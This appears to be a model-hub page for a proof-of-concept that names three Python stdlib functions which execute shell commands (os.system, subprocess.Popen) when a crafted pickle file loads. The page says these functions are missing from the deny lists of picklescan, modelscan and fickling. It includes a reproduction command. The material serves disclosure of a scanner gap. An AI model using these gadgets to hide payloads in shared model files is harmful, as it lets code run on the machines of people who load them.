Xiaoyao Pickle Bypass PoC
PoC demonstrating three undocumented stdlib modules that bypass picklescan, modelscan, and fickling.
Files
| File | Module | Mechanism | Size |
|---|---|---|---|
poc1_pyrepl_os.pkl |
_pyrepl.pager.tempfile_pager |
os.system(cmd + filename) |
94B |
poc2_pyrepl_subproc.pkl |
_pyrepl.pager.pipe_pager |
subprocess.Popen(cmd, shell=True) |
98B |
poc3_aix_support.pkl |
_aix_support._read_cmd_output |
os.system(cmd) |
78B |
Reproduction
python3 -c "import pickle; pickle.load(open('poc1_pyrepl_os.pkl','rb')); print(open('/tmp/pwned_pyrepl_os.txt').read())"
Scanner Coverage
These modules are NOT in the unsafe_globals of picklescan, modelscan, or fickling's UNSAFE_IMPORTS.
- Downloads last month
- -
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support